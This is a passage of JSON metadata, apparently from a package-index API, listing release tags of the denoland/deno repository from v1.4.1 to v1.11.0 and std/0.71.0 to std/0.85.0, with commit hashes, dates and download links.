":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts